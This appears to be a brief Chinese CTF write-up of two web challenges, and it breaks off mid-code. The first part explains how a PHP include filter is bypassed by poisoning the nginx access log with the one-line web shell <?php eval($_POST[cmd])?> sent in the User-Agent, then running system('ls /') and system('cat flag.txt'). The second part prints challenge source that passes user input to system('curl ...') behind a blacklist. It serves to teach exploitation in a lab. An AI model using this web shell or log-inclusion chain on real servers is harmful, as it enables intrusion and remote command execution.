ak赛 wp
签到_观己
正则匹配过滤了php,且大小写不敏感,后面又有include函数,已经是对php的伪协议的一个考点。
php被过滤,我们可以用data://伪协议
发现allow_url_include没有开启,还得另寻他法。做题的时候没想到有日志包含,还是题做得太少了。
payload:file=/var/log/nginx/access.log
通过将一句话木马写入到UA中
<?php eval($_POST[cmd])?>
执行一句话即可得到flag
payload:cmd=system('ls /');
payload:cmd=system('cat flag.txt');
web1_观字
<?php
#flag in http://192.168.7.68/flag
if(isset($_GET['url'])){
$url = $_GET['url'];
$protocol = substr($url, 0,7);
if($protocol!='http://'){
die('仅限http协议访问');
}
if(preg_match('/\.|\;|\||\<|\>|\*|\%|\^|\(|\)|\#|\@|\!|\`|\~|\+|\'|\"|\.|\,|\?|\[|\]|\{|\}|\!|\&|\$|0/', $url)){
die('仅限域名地址访问');
}
system('curl '.$url);<